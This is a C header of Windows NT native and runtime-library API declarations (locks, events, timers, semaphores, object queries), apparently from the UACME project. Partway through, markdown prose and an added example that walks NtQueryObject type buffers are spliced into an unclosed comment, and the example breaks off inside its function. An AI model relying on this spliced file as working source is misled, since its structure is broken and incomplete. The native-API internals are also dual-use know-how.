ULONG NumberGenericTableElements; ULONG DepthOfTree; PRTL_BALANCED_LINKS RestartKey; ULONG DeleteCount; PRTL_AVL_COMPARE_ROUTINE CompareRoutine; PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine; PRTL_AVL_FREE_ROUTINE FreeRoutine; PVOID TableContext; } RTL_AVL_TABLE, *PRTL_AVL_TABLE; NTSYSAPI VOID NTAPI RtlInitializeGenericTableAvl( _Out_ PRTL_AVL_TABLE Table, _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine, _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine, _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine, _In_opt_ PVOID TableContext); NTSYSAPI PVOID NTAPI RtlInsertElementGenericTableAvl( _In_ PRTL_AVL_TABLE Table, _In_reads_bytes_(BufferSize) PVOID Buffer, _In_ CLONG BufferSize, _Out_opt_ PBOOLEAN NewElement); NTSYSAPI PVOID NTAPI RtlInsertElementGenericTableFullAvl( _In_ PRTL_AVL_TABLE Table, _In_reads_bytes_(BufferSize) PVOID Buffer, _In_ CLONG BufferSize, _Out_opt_ PBOOLEAN NewElement, _In_ PVOID NodeOrParent, _In_ TABLE_SEARCH_RESULT SearchResult); NTSYSAPI BOOLEAN NTAPI 
RtlDeleteElementGenericTableAvl( _In_ PRTL_AVL_TABLE Table, _In_ PVOID Buffer); NTSYSAPI PVOID NTAPI RtlLookupElementGenericTableAvl( _In_ PRTL_AVL_TABLE Table, _In_ PVOID Buffer); NTSYSAPI PVOID NTAPI RtlLookupElementGenericTableFullAvl( _In_ PRTL_AVL_TABLE Table, _In_ PVOID Buffer, _Out_ PVOID *NodeOrParent, _Out_ TABLE_SEARCH_RESULT *SearchResult); NTSYSAPI PVOID NTAPI RtlEnumerateGenericTableAvl( _In_ PRTL_AVL_TABLE Table, _In_ BOOLEAN Restart); NTSYSAPI PVOID NTAPI RtlEnumerateGenericTableWithoutSplayingAvl( _In_ PRTL_AVL_TABLE Table, _Inout_ PVOID *RestartKey); NTSYSAPI PVOID NTAPI RtlLookupFirstMatchingElementGenericTableAvl( _In_ PRTL_AVL_TABLE Table, _In_ PVOID Buffer, _Out_ PVOID *RestartKey); NTSYSAPI PVOID NTAPI RtlEnumerateGenericTableLikeADirectory( _In_ PRTL_AVL_TABLE Table, _In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction, _In_opt_ PVOID MatchData, _In_ ULONG NextFlag, _Inout_ PVOID *RestartKey, _Inout_ PULONG DeleteCount, _In_ PVOID Buffer); NTSYSAPI PVOID NTAPI RtlGetElementGenericTableAvl( _In_ PRTL_AVL_TABLE Table, _In_ ULONG I); NTSYSAPI ULONG NTAPI RtlNumberGenericTableElementsAvl( _In_ PRTL_AVL_TABLE Table); NTSYSAPI BOOLEAN NTAPI RtlIsGenericTableEmptyAvl( _In_ PRTL_AVL_TABLE Table); /************************************************************************************ * * RTL Critical Section Support API. 
 * ************************************************************************************/

NTSYSAPI NTSTATUS NTAPI RtlEnterCriticalSection(
    _In_ PRTL_CRITICAL_SECTION CriticalSection);

NTSYSAPI NTSTATUS NTAPI RtlLeaveCriticalSection(
    _In_ PRTL_CRITICAL_SECTION CriticalSection);

NTSYSAPI LOGICAL NTAPI RtlIsCriticalSectionLocked(
    _In_ PRTL_CRITICAL_SECTION CriticalSection);

NTSYSAPI LOGICAL NTAPI RtlIsCriticalSectionLockedByThread(
    _In_ PRTL_CRITICAL_SECTION CriticalSection);

NTSYSAPI ULONG NTAPI RtlGetCriticalSectionRecursionCount(
    _In_ PRTL_CRITICAL_SECTION CriticalSection);

NTSYSAPI LOGICAL NTAPI RtlTryEnterCriticalSection(
    _In_ PRTL_CRITICAL_SECTION CriticalSection);

NTSYSAPI NTSTATUS NTAPI RtlInitializeCriticalSection(
    _In_ PRTL_CRITICAL_SECTION CriticalSection);

NTSYSAPI VOID NTAPI RtlEnableEarlyCriticalSectionEventCreation(
    VOID);

NTSYSAPI NTSTATUS NTAPI RtlInitializeCriticalSectionAndSpinCount(
    _In_ PRTL_CRITICAL_SECTION CriticalSection,
    _In_ ULONG SpinCount);

NTSYSAPI ULONG NTAPI RtlSetCriticalSectionSpinCount(
    _In_ PRTL_CRITICAL_SECTION CriticalSection,
    _In_ ULONG SpinCount);

NTSYSAPI NTSTATUS NTAPI RtlDeleteCriticalSection(
    _In_ PRTL_CRITICAL_SECTION CriticalSection);

/************************************************************************************
 *
 * RTL SRW Lock Support API.
 *
 ************************************************************************************/

NTSYSAPI VOID NTAPI RtlInitializeSRWLock(
    _Out_ PRTL_SRWLOCK SRWLock);

NTSYSAPI VOID NTAPI RtlAcquireSRWLockExclusive(
    _Inout_ PRTL_SRWLOCK SRWLock);

NTSYSAPI VOID NTAPI RtlAcquireSRWLockShared(
    _Inout_ PRTL_SRWLOCK SRWLock);

NTSYSAPI VOID NTAPI RtlReleaseSRWLockExclusive(
    _Inout_ PRTL_SRWLOCK SRWLock);

NTSYSAPI VOID NTAPI RtlReleaseSRWLockShared(
    _Inout_ PRTL_SRWLOCK SRWLock);

NTSYSAPI BOOLEAN NTAPI RtlTryAcquireSRWLockExclusive(
    _Inout_ PRTL_SRWLOCK SRWLock);

NTSYSAPI BOOLEAN NTAPI RtlTryAcquireSRWLockShared(
    _Inout_ PRTL_SRWLOCK SRWLock);

NTSYSAPI VOID NTAPI RtlAcquireReleaseSRWLockExclusive(
    _Inout_ PRTL_SRWLOCK SRWLock);

NTSYSAPI VOID NTAPI RtlUpdateClonedSRWLock(
    _Inout_ PRTL_SRWLOCK SRWLock,
    _In_ LOGICAL Shared);

/************************************************************************************
 *
 * RTL UAC Support API.
 *
 ************************************************************************************/

#define DBG_FLAG_ELEVATION_ENABLED 1
#define DBG_FLAG_VIRTUALIZATION_ENABLED 2
#define DBG_FLAG_INSTALLER_DETECT_ENABLED 3

NTSYSAPI NTSTATUS NTAPI RtlQueryElevationFlags(
    _Inout_ ULONG *ElevationFlags);

/************************************************************************************
 *
 * RTL Misc Support API.
 *
 ************************************************************************************/

NTSYSAPI BOOLEAN NTAPI RtlDoesFileExists_U(
    _In_ PCWSTR FileName);

NTSYSAPI ULONG NTAPI RtlGetLongestNtPathLength(
    VOID);

NTSYSAPI BOOLEAN NTAPI RtlAreLongPathsEnabled(
    VOID);

/************************************************************************************
 *
 * RTL Boundary Descriptor API.
 *
 ************************************************************************************/

NTSYSAPI PVOID NTAPI RtlCreateBoundaryDescriptor(
    _In_ PUNICODE_STRING Name,
    _In_ ULONG Flags);

NTSYSAPI VOID NTAPI RtlDeleteBoundaryDescriptor(
    _In_ _Post_invalid_ PVOID BoundaryDescriptor);

NTSYSAPI NTSTATUS NTAPI RtlAddSIDToBoundaryDescriptor(
    _Inout_ PVOID *BoundaryDescriptor,
    _In_ PSID RequiredSid);

NTSYSAPI NTSTATUS NTAPI RtlAddIntegrityLabelToBoundaryDescriptor(
    _Inout_ PVOID *BoundaryDescriptor,
    _In_ PSID IntegrityLabel);

/************************************************************************************
 *
 * RTL work item/async IO.
 *
 ************************************************************************************/

NTSYSAPI NTSTATUS NTAPI RtlQueueWorkItem(
    _In_ WORKERCALLBACKFUNC Function,
    _In_ PVOID Context,
    _In_ ULONG Flags);

NTSYSAPI NTSTATUS NTAPI RtlSetIoCompletionCallback(
    _In_ HANDLE FileHandle,
    _In_ APC_CALLBACK_FUNCTION CompletionProc,
    _In_ ULONG Flags);

/************************************************************************************
 *
 * RTL data exports.
 *
 ************************************************************************************/

#ifndef _M_X64
#define RtlNtdllName L"ntdll.dll"
#define RtlDosPathSeperatorsString ((UNICODE_STRING)RTL_CONSTANT_STRING(L"\\/"))
#define RtlAlternateDosPathSeperatorString ((UNICODE_STRING)RTL_CONSTANT_STRING(L"/"))
#define RtlNtPathSeperatorString ((UNICODE_STRING)RTL_CONSTANT_STRING(L"\\"))
#else
NTSYSAPI PWSTR RtlNtdllName;
NTSYSAPI UNICODE_STRING RtlDosPathSeperatorsString;
NTSYSAPI UNICODE_STRING RtlAlternateDosPathSeperatorString;
NTSYSAPI UNICODE_STRING RtlNtPathSeperatorString;
#endif

/************************************************************************************
 *
 * ETW API.
 *
 ************************************************************************************/

typedef VOID(NTAPI *PETWENABLECALLBACK)(
    _In_ LPCGUID SourceId,
    _In_ ULONG IsEnabled,
    _In_ UCHAR Level,
    _In_ ULONGLONG MatchAnyKeyword,
    _In_ ULONGLONG MatchAllKeyword,
    _In_opt_ /*EVENT_FILTER_DESCRIPTOR*/ PVOID FilterData,
    _Inout_opt_ PVOID CallbackContext
    );

NTSYSAPI NTSTATUS NTAPI EtwEventRegister(
    _In_ LPCGUID ProviderId,
    _In_opt_ PETWENABLECALLBACK EnableCallback,
    _In_opt_ PVOID CallbackContext,
    _Out_ PREGHANDLE RegHandle);

NTSYSAPI ULONG NTAPI EtwEventWriteNoRegistration(
    _In_ LPCGUID ProviderId,
    _In_ /*PCEVENT_DESCRIPTOR*/ PVOID EventDescriptor,
    _In_ ULONG UserDataCount,
    _In_reads_opt_(UserDataCount) /*PEVENT_DATA_DESCRIPTOR*/ PVOID UserData);

/*
** Runtime Library API END
*/

/*
** Native API START
*/

/************************************************************************************
 *
 * System Information API.
 *
 ************************************************************************************/

NTSYSAPI NTSTATUS NTAPI NtQuerySystemInformation(
    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
    _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
    _In_ ULONG SystemInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI NTSTATUS NTAPI NtQuerySystemInformationEx(
    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
    _In_reads_bytes_(InputBufferLength) PVOID InputBuffer,
    _In_ ULONG InputBufferLength,
    _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
    _In_ ULONG SystemInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI NTSTATUS NTAPI NtSetSystemInformation(
    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
    _In_reads_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
    _In_ ULONG SystemInformationLength);

/************************************************************************************
 *
 * Event (EventPair) API.
 * ************************************************************************************/

typedef enum _EVENT_INFORMATION_CLASS {
    EventBasicInformation
} EVENT_INFORMATION_CLASS;

typedef enum _EVENT_TYPE {
    NotificationEvent,
    SynchronizationEvent
} EVENT_TYPE;

typedef struct _EVENT_BASIC_INFORMATION {
    EVENT_TYPE EventType;
    LONG EventState;
} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;

NTSYSAPI NTSTATUS NTAPI NtCreateEvent(
    _Out_ PHANDLE EventHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ EVENT_TYPE EventType,
    _In_ BOOLEAN InitialState);

NTSYSAPI NTSTATUS NTAPI NtOpenEvent(
    _Out_ PHANDLE EventHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtSetEvent(
    _In_ HANDLE EventHandle,
    _Out_opt_ PLONG PreviousState);

NTSYSAPI NTSTATUS NTAPI NtSetEventEx(
    _In_ HANDLE ThreadId,
    _In_opt_ PRTL_SRWLOCK Lock);

NTSYSAPI NTSTATUS NTAPI NtClearEvent(
    _In_ HANDLE EventHandle);

NTSYSAPI NTSTATUS NTAPI NtResetEvent(
    _In_ HANDLE EventHandle,
    _Out_opt_ PLONG PreviousState);

NTSYSAPI NTSTATUS NTAPI NtPulseEvent(
    _In_ HANDLE EventHandle,
    _Out_opt_ PLONG PreviousState);

NTSYSAPI NTSTATUS NTAPI NtOpenKeyedEvent(
    _Out_ PHANDLE KeyedEventHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtQueryEvent(
    _In_ HANDLE EventHandle,
    _In_ EVENT_INFORMATION_CLASS EventInformationClass,
    _Out_writes_bytes_(EventInformationLength) PVOID EventInformation,
    _In_ ULONG EventInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI NTSTATUS NTAPI NtCreateEventPair(
    _Out_ PHANDLE EventPairHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtOpenEventPair(
    _Out_ PHANDLE EventPairHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtSetLowEventPair(
    _In_ HANDLE EventPairHandle);

NTSYSAPI NTSTATUS NTAPI NtSetHighEventPair(
    _In_ HANDLE EventPairHandle);

NTSYSAPI NTSTATUS NTAPI NtWaitLowEventPair(
    _In_ HANDLE EventPairHandle);

NTSYSAPI NTSTATUS NTAPI NtWaitHighEventPair(
    _In_ HANDLE EventPairHandle);

NTSYSAPI NTSTATUS NTAPI NtSetLowWaitHighEventPair(
    _In_ HANDLE EventPairHandle);

NTSYSAPI NTSTATUS NTAPI NtSetHighWaitLowEventPair(
    _In_ HANDLE EventPairHandle);

/************************************************************************************
 *
 * Mutant API.
 *
 ************************************************************************************/

typedef enum _MUTANT_INFORMATION_CLASS {
    MutantBasicInformation,
    MutantOwnerInformation
} MUTANT_INFORMATION_CLASS;

typedef struct _MUTANT_BASIC_INFORMATION {
    LONG CurrentCount;
    BOOLEAN OwnedByCaller;
    BOOLEAN AbandonedState;
} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;

typedef struct _MUTANT_OWNER_INFORMATION {
    CLIENT_ID ClientId;
} MUTANT_OWNER_INFORMATION, *PMUTANT_OWNER_INFORMATION;

NTSYSAPI NTSTATUS NTAPI NtCreateMutant(
    _Out_ PHANDLE MutantHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ BOOLEAN InitialOwner);

NTSYSAPI NTSTATUS NTAPI NtOpenMutant(
    _Out_ PHANDLE MutantHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtQueryMutant(
    _In_ HANDLE MutantHandle,
    _In_ MUTANT_INFORMATION_CLASS MutantInformationClass,
    _Out_writes_bytes_(MutantInformationLength) PVOID MutantInformation,
    _In_ ULONG MutantInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI NTSTATUS NTAPI NtReleaseMutant(
    _In_ HANDLE MutantHandle,
    _Out_opt_ PLONG PreviousCount);

/************************************************************************************
 *
 * Timer API.
 *
 ************************************************************************************/

typedef VOID(*PTIMER_APC_ROUTINE) (
    _In_ PVOID TimerContext,
    _In_ ULONG TimerLowValue,
    _In_ LONG TimerHighValue
    );

typedef enum _TIMER_TYPE {
    NotificationTimer,
    SynchronizationTimer
} TIMER_TYPE;

typedef enum _TIMER_INFORMATION_CLASS {
    TimerBasicInformation
} TIMER_INFORMATION_CLASS;

typedef struct _TIMER_BASIC_INFORMATION {
    LARGE_INTEGER RemainingTime;
    BOOLEAN TimerState;
} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;

typedef enum _TIMER_SET_INFORMATION_CLASS {
    TimerSetCoalescableTimer,
    MaxTimerInfoClass
} TIMER_SET_INFORMATION_CLASS;

// TimerHandle is written by the call, so it is annotated _Out_ like the other object creators.
NTSYSAPI NTSTATUS NTAPI NtCreateTimer(
    _Out_ PHANDLE TimerHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ TIMER_TYPE TimerType);

NTSYSAPI NTSTATUS NTAPI NtCreateTimer2(
    _Out_ PHANDLE TimerHandle,
    _In_opt_ PVOID Reserved1,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ ULONG Attributes,
    _In_ ACCESS_MASK DesiredAccess);

NTSYSAPI NTSTATUS NTAPI NtSetTimer(
    _In_ HANDLE TimerHandle,
    _In_ PLARGE_INTEGER DueTime,
    _In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine,
    _In_opt_ PVOID TimerContext,
    _In_ BOOLEAN WakeTimer,
    _In_opt_ LONG Period,
    _Out_opt_ PBOOLEAN PreviousState);

NTSYSAPI NTSTATUS NTAPI NtSetTimer2(
    _In_ HANDLE TimerHandle,
    _In_ PLARGE_INTEGER DueTime,
    _In_opt_ PLARGE_INTEGER Period,
    _In_ PVOID Parameters);

NTSYSAPI NTSTATUS NTAPI NtSetTimerEx(
    _In_ HANDLE TimerHandle,
    _In_ TIMER_SET_INFORMATION_CLASS TimerSetInformationClass,
    _Inout_updates_bytes_opt_(TimerSetInformationLength) PVOID TimerSetInformation,
    _In_ ULONG TimerSetInformationLength);

NTSYSAPI NTSTATUS NTAPI NtOpenTimer(
    _Out_ PHANDLE TimerHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtQueryTimer(
    _In_ HANDLE TimerHandle,
    _In_ TIMER_INFORMATION_CLASS TimerInformationClass,
    _Out_writes_bytes_(TimerInformationLength) PVOID TimerInformation,
    _In_ ULONG TimerInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI NTSTATUS NTAPI NtCancelTimer(
    _In_ HANDLE TimerHandle,
    _Out_opt_ PBOOLEAN CurrentState);

NTSYSAPI NTSTATUS NTAPI NtCancelTimer2(
    _In_ HANDLE TimerHandle,
    _In_ PVOID Parameters);

//ref from ph2
NTSYSAPI NTSTATUS NTAPI NtCreateIRTimer(
    _Out_ PHANDLE TimerHandle,
    _In_ ACCESS_MASK DesiredAccess);

NTSYSAPI NTSTATUS NTAPI NtSetIRTimer(
    _In_ HANDLE TimerHandle,
    _In_opt_ PLARGE_INTEGER DueTime);

/************************************************************************************
 *
 * Semaphore API.
 *
 ************************************************************************************/

typedef enum _SEMAPHORE_INFORMATION_CLASS {
    SemaphoreBasicInformation
} SEMAPHORE_INFORMATION_CLASS;

typedef struct _SEMAPHORE_BASIC_INFORMATION {
    LONG CurrentCount;
    LONG MaximumCount;
} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;

NTSYSAPI NTSTATUS NTAPI NtCreateSemaphore(
    _Out_ PHANDLE SemaphoreHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ LONG InitialCount,
    _In_ LONG MaximumCount);

NTSYSAPI NTSTATUS NTAPI NtOpenSemaphore(
    _Out_ PHANDLE SemaphoreHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtQuerySemaphore(
    _In_ HANDLE SemaphoreHandle,
    _In_ SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,
    _Out_writes_bytes_(SemaphoreInformationLength) PVOID SemaphoreInformation,
    _In_ ULONG SemaphoreInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI NTSTATUS NTAPI NtReleaseSemaphore(
    _In_ HANDLE SemaphoreHandle,
    _In_ LONG ReleaseCount,
    _Out_opt_ PLONG PreviousCount);

/************************************************************************************
 *
 * Object and Handle API.
 * ************************************************************************************/

typedef enum _OBJECT_INFORMATION_CLASS {
    ObjectBasicInformation,
    ObjectNameInformation,
    ObjectTypeInformation,
    ObjectTypesInformation,
    ObjectHandleFlagInformation,
    ObjectSessionInformation,
    ObjectSessionObjectInformation,
    ObjectSetRefTraceInformation,
    MaxObjectInfoClass
} OBJECT_INFORMATION_CLASS;

typedef struct _OBJECT_DIRECTORY_INFORMATION {
    UNICODE_STRING Name;
    UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;

typedef struct _OBJECT_BASIC_INFORMATION {
    ULONG Attributes;
    ACCESS_MASK GrantedAccess;
    ULONG HandleCount;
    ULONG PointerCount;
    ULONG PagedPoolCharge;
    ULONG NonPagedPoolCharge;
    ULONG Reserved[3];
    ULONG NameInfoSize;
    ULONG TypeInfoSize;
    ULONG SecurityDescriptorSize;
    LARGE_INTEGER CreationTime;
} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;

typedef struct _OBJECT_NAME_INFORMATION {
    UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;

typedef struct _OBJECT_TYPE_INFORMATION {
    UNICODE_STRING TypeName;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG TotalPagedPoolUsage;
    ULONG TotalNonPagedPoolUsage;
    ULONG TotalNamePoolUsage;
    ULONG TotalHandleTableUsage;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    ULONG HighWaterPagedPoolUsage;
    ULONG HighWaterNonPagedPoolUsage;
    ULONG HighWaterNamePoolUsage;
    ULONG HighWaterHandleTableUsage;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    BOOLEAN SecurityRequired;
    BOOLEAN MaintainHandleCount;
    ULONG PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;

typedef struct _OBJECT_TYPE_INFORMATION_V2 {
    UNICODE_STRING TypeName;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG TotalPagedPoolUsage;
    ULONG TotalNonPagedPoolUsage;
    ULONG TotalNamePoolUsage;
    ULONG TotalHandleTableUsage;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    ULONG HighWaterPagedPoolUsage;
    ULONG HighWaterNonPagedPoolUsage;
    ULONG HighWaterNamePoolUsage;
    ULONG HighWaterHandleTableUsage;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    BOOLEAN SecurityRequired;
    BOOLEAN MaintainHandleCount;
    UCHAR TypeIndex;
    CHAR ReservedByte;
    ULONG PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
} OBJECT_TYPE_INFORMATION_V2, *POBJECT_TYPE_INFORMATION_V2;

typedef struct _OBJECT_TYPES_INFORMATION {
    ULONG NumberOfTypes;
} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;

#define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\
    RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR))

#define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\
    RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \
    ALIGN_UP(ObjectType->TypeName.MaximumLength, ULONG_PTR))

typedef struct _OBJECT_HANDLE_FLAG_INFORMATION {
    BOOLEAN Inherit;
    BOOLEAN ProtectFromClose;
} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;

NTSYSAPI NTSTATUS NTAPI NtClose(
    _In_ _Post_ptr_invalid_ HANDLE Handle);

NTSYSAPI NTSTATUS NTAPI NtDuplicateObject(
    _In_ HANDLE SourceProcessHandle,
    _In_ HANDLE SourceHandle,
    _In_opt_ HANDLE TargetProcessHandle,
    _Out_ PHANDLE TargetHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ ULONG HandleAttributes,
    _In_ ULONG Options);

NTSYSAPI NTSTATUS NTAPI NtMakePermanentObject(
    _In_ HANDLE Handle);

NTSYSAPI NTSTATUS NTAPI NtMakeTemporaryObject(
    _In_ HANDLE Handle);

NTSYSAPI NTSTATUS NTAPI NtSetSecurityObject(
    _In_ HANDLE Handle,
    _In_ SECURITY_INFORMATION SecurityInformation,
    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);

NTSYSAPI NTSTATUS NTAPI NtQuerySecurityObject(
    _In_ HANDLE Handle,
    _In_ SECURITY_INFORMATION SecurityInformation,
    _Out_writes_bytes_opt_(Length) PSECURITY_DESCRIPTOR SecurityDescriptor,
    _In_ ULONG Length,
    _Out_ PULONG LengthNeeded);

NTSYSAPI NTSTATUS NTAPI NtCompareObjects(
    _In_ HANDLE FirstObjectHandle,
    _In_ HANDLE SecondObjectHandle);

NTSYSAPI NTSTATUS NTAPI NtQueryObject(
    _In_opt_ HANDLE Handle,
    _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
    _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation,
    _In_ ULONG ObjectInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI NTSTATUS NTAPI NtSetInformationObject(
    _In_ HANDLE Handle,
    _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
    _In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation,
    _In_ ULONG ObjectInformationLength);

typedef enum _WAIT_TYPE {
    WaitAll,
    WaitAny,
    WaitNotification
} WAIT_TYPE;

NTSYSAPI NTSTATUS NTAPI NtWaitForSingleObject(
    _In_ HANDLE Handle,
    _In_ BOOLEAN Alertable,
    _In_opt_ PLARGE_INTEGER Timeout);

NTSYSAPI NTSTATUS NTAPI NtWaitForMultipleObjects(
    _In_ ULONG Count,
    _In_reads_(Count) HANDLE Handles[],
    _In_ WAIT_TYPE WaitType,
    _In_ BOOLEAN Alertable,
    _In_opt_ PLARGE_INTEGER Timeout);

/************************************************************************************
 *
 * Time.
 *
 ************************************************************************************/

NTSYSAPI NTSTATUS NTAPI NtQuerySystemTime(
    _Out_ PLARGE_INTEGER SystemTime);

NTSYSAPI NTSTATUS NTAPI NtSetSystemTime(
    _In_opt_ PLARGE_INTEGER SystemTime,
    _Out_opt_ PLARGE_INTEGER PreviousTime);

NTSYSAPI NTSTATUS NTAPI NtQueryTimerResolution(
    _Out_ PULONG MaximumTime,
    _Out_ PULONG MinimumTime,
    _Out_ PULONG CurrentTime);

NTSYSAPI NTSTATUS NTAPI NtSetTimerResolution(
    _In_ ULONG DesiredTime,
    _In_ BOOLEAN SetResolution,
    _Out_ PULONG ActualTime);

/************************************************************************************
 *
 * Directory Object API.
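The `OBJECT_TYPES_FIRST_ENTRY` / `OBJECT_TYPES_NEXT_ENTRY` macros above encode the layout of the buffer that `NtQueryObject(NULL, ObjectTypesInformation, ...)` fills: a `NumberOfTypes` header, then one `OBJECT_TYPE_INFORMATION` per type with its `TypeName` characters stored immediately after the structure, each next entry rounded up to pointer alignment. The walker below is an added example and is not UACME code. It mirrors `OBJECT_TYPE_INFORMATION_V2` under the hypothetical names `OBJ_TYPE_INFO` / `OBJ_TYPES_INFO` so it builds with or without `ntos.h`, bounds-checks every entry against the buffer length before touching it, reads each name from the bytes following the entry rather than through `TypeName.Buffer`, and resolves the type's `TypeIndex` (the value that `SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.ObjectTypeIndex` carries). On Windows `main` runs the live query through `ntdll!NtQueryObject`; on any host the constructed sample (type names and indices made up for the test) exercises the walker, including the truncated-buffer case.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#include <winternl.h>
#else /* stand-ins for the Windows types used below, so the walker builds anywhere */
typedef uint8_t BOOLEAN, UCHAR; typedef char CHAR; typedef uint16_t USHORT, WCHAR;
typedef uint32_t ULONG; typedef uintptr_t ULONG_PTR;
typedef struct { USHORT Length, MaximumLength; WCHAR *Buffer; } UNICODE_STRING;
typedef struct { ULONG GenericRead, GenericWrite, GenericExecute, GenericAll; } GENERIC_MAPPING;
#endif

/* Same layout as OBJECT_TYPE_INFORMATION_V2 / OBJECT_TYPES_INFORMATION in ntos.h (0x68 and 4
 * bytes on x64), under hypothetical names so this file builds with or without that header. */
typedef struct {
    UNICODE_STRING TypeName;
    ULONG TotalNumberOfObjects, TotalNumberOfHandles, TotalPagedPoolUsage, TotalNonPagedPoolUsage;
    ULONG TotalNamePoolUsage, TotalHandleTableUsage, HighWaterNumberOfObjects, HighWaterNumberOfHandles;
    ULONG HighWaterPagedPoolUsage, HighWaterNonPagedPoolUsage, HighWaterNamePoolUsage, HighWaterHandleTableUsage;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    BOOLEAN SecurityRequired, MaintainHandleCount;
    UCHAR TypeIndex;
    CHAR ReservedByte;
    ULONG PoolType, DefaultPagedPoolCharge, DefaultNonPagedPoolCharge;
} OBJ_TYPE_INFO;
typedef struct { ULONG NumberOfTypes; } OBJ_TYPES_INFO;

/* Same rounding as ALIGN_UP(x, ULONG_PTR) in the OBJECT_TYPES_*_ENTRY macros. */
#define ALIGN_UP_PTR(n) (((size_t)(n) + sizeof(ULONG_PTR) - 1) & ~(sizeof(ULONG_PTR) - 1))

/* TypeIndex of the type named `ascii` (case-sensitive), or -1 if absent or the buffer is
 * malformed. Every entry is bounds-checked before it is dereferenced, and the name is read
 * from the bytes that follow the entry, not through TypeName.Buffer, so neither a short
 * buffer nor a bad pointer can steer the read outside [buf, buf + len). */
int FindTypeIndex(const void *buf, size_t len, const char *ascii)
{
    const uint8_t *base = (const uint8_t *)buf;
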